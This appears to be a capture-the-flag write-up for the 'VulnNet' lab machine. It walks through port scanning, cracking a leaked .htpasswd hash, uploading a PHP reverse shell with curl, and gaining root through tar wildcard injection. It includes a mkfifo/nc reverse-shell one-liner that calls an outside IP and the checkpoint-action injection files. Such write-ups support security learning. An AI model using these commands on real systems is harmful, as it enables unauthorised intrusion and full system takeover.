PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 ea:c9:e8:67:76:0a:3f:97:09:a7:d7:a6:63:ad:c1:2c (RSA) | 256 0f:c8:f6:d3:8e:4c:ea:67:47:68:84:dc:1c:2b:2e:34 (ECDSA) |_ 256 05:53:99:fc:98:10:b5:c3:68:00:6c:29:41:da:a5:c9 (ED25519) 80/tcp open http Apache httpd 2.4.29 ((Ubuntu)) |_http-server-header: Apache/2.4.29 (Ubuntu) |_http-title: VulnNet Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Initial nmap results, let’s head to the web server…
We get thwacked with a basic authentication screen and it doesn’t seem so easy to bypass. Will return to the web server and see what else we can find first.
The only user with a shell is server-management, there’s no ssh keys for the user we can grab. We can’t find accessible Apache access logs for poisoning, but we can check the .htpasswd file and see if we can get some users for the subdomain authentication…
We grab the username developers and the MD5 hash so let’s try and crack it.
There we go, developers:9972761drmfsls is our creds. Let’s try the login form we saw earlier.
Exploit DB gives us a situation where we can exploit a module for unauthenticated file upload, so we’ll try a PHP reverse shell…
curl -F "email@example.com" -F "plupload=1" -F "name=shell.php" 'http://broadcast.vulnnet.thm/actions/beats_uploader.php' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8' -H 'Accept-Language: en-US,en;q=0.5' -H 'Accept-Encoding: gzip, deflate' -H 'Authorization: Basic ZGV2ZWxvcGVyczo5OTcyNzYxZHJtZnNscw=='
The uploader renames files, but visiting http://broadcast.vulnnet.thm/actions/CB_BEATS_UPLOAD_DIR gives us a directory list anyway, so with that we can start up our listener and pop a shell!
With that we can kill our www-data shell and be comfortable in an SSH session.
We find a script owned by root backing up our Documents folder regularly. The tar backup command uses a wildcard so we can easily exploit this.
server-management@vulnnet:/tmp$ cat /var/opt/backupsrv.sh #!/bin/bash # Where to backup to. dest="/var/backups" # What to backup. cd /home/server-management/Documents backup_files="*"
Moving to our home directory we create the following files.
touch '--checkpoint=1' touch '--checkpoint-action=exec=sh shell.sh' and finally a quick mkfifo reverse shell in shell.sh #!/bin/bash rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.18.105.64 1234 >/tmp/f
All that’s left to do is open another listener and wait for a call…
There’s our shell, and our root flag.
This was a nice room, with multiple not-too-complicated layers to getting a foothold.